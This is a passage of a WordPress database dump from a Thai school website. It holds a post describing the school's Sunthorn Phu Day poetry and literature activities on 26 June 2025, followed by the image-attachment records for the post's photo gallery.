(1421,1,'2025-06-26 14:08:52','2025-06-26 07:08:52','<!-- wp:paragraph -->\n<p><strong></strong><strong>วันที่ 26 เดือนมิถุนายน พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันสุนทรภู่ กวีเอกของโลก เพื่อเป็นการส่งเสริมให้นักเรียนได้ร่วมกันรำลึกถึงเกียรติคุณของท่านสุนทรภู่ และยกย่องเชิดชู ท่านสุนทรภู่ ตลอดจนเป็นการส่งเสริมบทกวี และวรรณกรรม ซึ่งเป็นผลงานของท่านสุนทรภู่ ให้เยาวชนได้ร่วมกันสืบทอด</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ณ ใต้ถุนอาคารเรียนหลังเรียนหลังใหม่ โดยมี </strong><strong>นายมีชัย</strong><strong> </strong><strong>สายเหล็ก</strong><strong> รองนายกองค์การบริหารส่วนตำบลโพธิ์ เป็นประธานในพิธี กิจกรรมประกอบไปด้วยกิจกรรม การแต่งกายเป็นตัวละครในวรรณคดี การประกวดแต่งกลอน การแข่งขันวาดภาพระบายสี ฯลฯ โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1423,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1-768x1024.jpg\" alt=\"\" class=\"wp-image-1423\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1424,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2-768x1024.jpg\" alt=\"\" class=\"wp-image-1424\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1428,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3-768x1024.jpg\" alt=\"\" class=\"wp-image-1428\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1425,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4-768x1024.jpg\" alt=\"\" class=\"wp-image-1425\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1427,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5-1024x768.jpg\" alt=\"\" class=\"wp-image-1427\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1426,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6-768x1024.jpg\" alt=\"\" class=\"wp-image-1426\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1429,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7-768x1024.jpg\" alt=\"\" class=\"wp-image-1429\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1431,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-1-1024x577.jpg\" alt=\"\" class=\"wp-image-1431\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1433,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9-1024x577.jpg\" alt=\"\" class=\"wp-image-1433\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1430,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10-1024x577.jpg\" alt=\"\" class=\"wp-image-1430\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1432,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11-1024x577.jpg\" alt=\"\" class=\"wp-image-1432\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1434,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-1024x577.jpg\" alt=\"\" class=\"wp-image-1434\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13-1024x577.jpg\" alt=\"\" class=\"wp-image-1436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1435,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14-1024x577.jpg\" alt=\"\" class=\"wp-image-1435\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1437,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15-1024x577.jpg\" alt=\"\" class=\"wp-image-1437\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16-1024x577.jpg\" alt=\"\" class=\"wp-image-1438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1439,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17-1024x577.jpg\" alt=\"\" class=\"wp-image-1439\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_18-1024x577.jpg\" alt=\"\" class=\"wp-image-1440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_19-577x1024.jpg\" alt=\"\" class=\"wp-image-1441\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_20-1024x577.jpg\" alt=\"\" class=\"wp-image-1442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1443,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_21-1024x577.jpg\" alt=\"\" class=\"wp-image-1443\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_22-1024x577.jpg\" alt=\"\" class=\"wp-image-1444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_23-1024x577.jpg\" alt=\"\" class=\"wp-image-1446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_24-1024x577.jpg\" alt=\"\" class=\"wp-image-1445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_25-1024x577.jpg\" alt=\"\" class=\"wp-image-1447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_26-1024x577.jpg\" alt=\"\" class=\"wp-image-1448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_27-1024x576.jpg\" alt=\"\" class=\"wp-image-1449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1451,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_28-1024x576.jpg\" alt=\"\" class=\"wp-image-1451\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_29-1024x576.jpg\" alt=\"\" class=\"wp-image-1450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1452,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_30-1024x576.jpg\" alt=\"\" class=\"wp-image-1452\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1453,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_31-1024x576.jpg\" alt=\"\" class=\"wp-image-1453\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1454,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_32-1024x576.jpg\" alt=\"\" class=\"wp-image-1454\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1455,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_33-1024x576.jpg\" alt=\"\" class=\"wp-image-1455\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','วันสุนทรภู่ สู่ วันภาษาไทย','','publish','closed','closed','','%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88-%e0%b8%aa%e0%b8%b9%e0%b9%88-%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b9%84','','','2025-06-26 14:08:54','2025-06-26 07:08:54','',0,'http://pakhaeng.ssk.in.th/?p=1421',0,'post','',0),
(1422,1,'2025-06-26 14:07:57','2025-06-26 07:07:57','','LINE_ALBUM_วันสุนทรภู่_250626_8','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_8','','','2025-06-26 14:07:57','2025-06-26 07:07:57','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8.jpg',0,'attachment','image/jpeg',0),
(1423,1,'2025-06-26 14:08:23','2025-06-26 07:08:23','','LINE_ALBUM_วันสุนทรภู่_250626_1','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_1','','','2025-06-26 14:08:23','2025-06-26 07:08:23','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1.jpg',0,'attachment','image/jpeg',0),
(1424,1,'2025-06-26 14:08:23','2025-06-26 07:08:23','','LINE_ALBUM_วันสุนทรภู่_250626_2','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_2','','','2025-06-26 14:08:23','2025-06-26 07:08:23','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2.jpg',0,'attachment','image/jpeg',0),
(1425,1,'2025-06-26 14:08:23','2025-06-26 07:08:23','','LINE_ALBUM_วันสุนทรภู่_250626_4','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_4','','','2025-06-26 14:08:23','2025-06-26 07:08:23','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4.jpg',0,'attachment','image/jpeg',0),
(1426,1,'2025-06-26 14:08:23','2025-06-26 07:08:23','','LINE_ALBUM_วันสุนทรภู่_250626_6','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_6','','','2025-06-26 14:08:23','2025-06-26 07:08:23','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6.jpg',0,'attachment','image/jpeg',0),
(1427,1,'2025-06-26 14:08:23','2025-06-26 07:08:23','','LINE_ALBUM_วันสุนทรภู่_250626_5','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_5','','','2025-06-26 14:08:23','2025-06-26 07:08:23','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5.jpg',0,'attachment','image/jpeg',0),
(1428,1,'2025-06-26 14:08:23','2025-06-26 07:08:23','','LINE_ALBUM_วันสุนทรภู่_250626_3','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_3','','','2025-06-26 14:08:23','2025-06-26 07:08:23','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3.jpg',0,'attachment','image/jpeg',0),
(1429,1,'2025-06-26 14:08:26','2025-06-26 07:08:26','','LINE_ALBUM_วันสุนทรภู่_250626_7','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_7','','','2025-06-26 14:08:26','2025-06-26 07:08:26','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7.jpg',0,'attachment','image/jpeg',0),
(1430,1,'2025-06-26 14:08:27','2025-06-26 07:08:27','','LINE_ALBUM_วันสุนทรภู่_250626_10','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_10','','','2025-06-26 14:08:27','2025-06-26 07:08:27','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10.jpg',0,'attachment','image/jpeg',0),
(1431,1,'2025-06-26 14:08:27','2025-06-26 07:08:27','','LINE_ALBUM_วันสุนทรภู่_250626_8','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_8-2','','','2025-06-26 14:08:27','2025-06-26 07:08:27','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-1.jpg',0,'attachment','image/jpeg',0),
(1432,1,'2025-06-26 14:08:27','2025-06-26 07:08:27','','LINE_ALBUM_วันสุนทรภู่_250626_11','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_11','','','2025-06-26 14:08:27','2025-06-26 07:08:27','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11.jpg',0,'attachment','image/jpeg',0),
(1433,1,'2025-06-26 14:08:27','2025-06-26 07:08:27','','LINE_ALBUM_วันสุนทรภู่_250626_9','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_9','','','2025-06-26 14:08:27','2025-06-26 07:08:27','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9.jpg',0,'attachment','image/jpeg',0),
(1434,1,'2025-06-26 14:08:27','2025-06-26 07:08:27','','LINE_ALBUM_วันสุนทรภู่_250626_12','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_12','','','2025-06-26 14:08:27','2025-06-26 07:08:27','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12.jpg',0,'attachment','image/jpeg',0),
(1435,1,'2025-06-26 14:08:29','2025-06-26 07:08:29','','LINE_ALBUM_วันสุนทรภู่_250626_14','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_14','','','2025-06-26 14:08:29','2025-06-26 07:08:29','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14.jpg',0,'attachment','image/jpeg',0),
(1436,1,'2025-06-26 14:08:29','2025-06-26 07:08:29','','LINE_ALBUM_วันสุนทรภู่_250626_13','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_13','','','2025-06-26 14:08:29','2025-06-26 07:08:29','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13.jpg',0,'attachment','image/jpeg',0),
(1437,1,'2025-06-26 14:08:29','2025-06-26 07:08:29','','LINE_ALBUM_วันสุนทรภู่_250626_15','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_15','','','2025-06-26 14:08:29','2025-06-26 07:08:29','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15.jpg',0,'attachment','image/jpeg',0),
(1438,1,'2025-06-26 14:08:30','2025-06-26 07:08:30','','LINE_ALBUM_วันสุนทรภู่_250626_16','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_16','','','2025-06-26 14:08:30','2025-06-26 07:08:30','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16.jpg',0,'attachment','image/jpeg',0),
(1439,1,'2025-06-26 14:08:30','2025-06-26 07:08:30','','LINE_ALBUM_วันสุนทรภู่_250626_17','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_17','','','2025-06-26 14:08:30','2025-06-26 07:08:30','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17.jpg',0,'attachment','image/jpeg',0),
(1440,1,'2025-06-26 14:08:30','2025-06-26 07:08:30','','LINE_ALBUM_วันสุนทรภู่_250626_18','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_18','','','2025-06-26 14:08:30','2025-06-26 07:08:30','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_18.jpg',0,'attachment','image/jpeg',0),
(1441,1,'2025-06-26 14:08:32','2025-06-26 07:08:32','','LINE_ALBUM_วันสุนทรภู่_250626_19','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_19','','','2025-06-26 14:08:32','2025-06-26 07:08:32','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_19.jpg',0,'attachment','image/jpeg',0),
(1442,1,'2025-06-26 14:08:32','2025-06-26 07:08:32','','LINE_ALBUM_วันสุนทรภู่_250626_20','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_20','','','2025-06-26 14:08:32','2025-06-26 07:08:32','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_20.jpg',0,'attachment','image/jpeg',0),
(1443,1,'2025-06-26 14:08:32','2025-06-26 07:08:32','','LINE_ALBUM_วันสุนทรภู่_250626_21','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_21','','','2025-06-26 14:08:32','2025-06-26 07:08:32','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_21.jpg',0,'attachment','image/jpeg',0),
(1444,1,'2025-06-26 14:08:32','2025-06-26 07:08:32','','LINE_ALBUM_วันสุนทรภู่_250626_22','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_22','','','2025-06-26 14:08:32','2025-06-26 07:08:32','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_22.jpg',0,'attachment','image/jpeg',0),
(1445,1,'2025-06-26 14:08:32','2025-06-26 07:08:32','','LINE_ALBUM_วันสุนทรภู่_250626_24','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_24','','','2025-06-26 14:08:32','2025-06-26 07:08:32','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_24.jpg',0,'attachment','image/jpeg',0),
(1446,1,'2025-06-26 14:08:32','2025-06-26 07:08:32','','LINE_ALBUM_วันสุนทรภู่_250626_23','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_23','','','2025-06-26 14:08:32','2025-06-26 07:08:32','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_23.jpg',0,'attachment','image/jpeg',0),
(1447,1,'2025-06-26 14:08:34','2025-06-26 07:08:34','','LINE_ALBUM_วันสุนทรภู่_250626_25','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_25','','','2025-06-26 14:08:34','2025-06-26 07:08:34','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_25.jpg',0,'attachment','image/jpeg',0),
(1448,1,'2025-06-26 14:08:34','2025-06-26 07:08:34','','LINE_ALBUM_วันสุนทรภู่_250626_26','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_26','','','2025-06-26 14:08:34','2025-06-26 07:08:34','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_26.jpg',0,'attachment','image/jpeg',0),
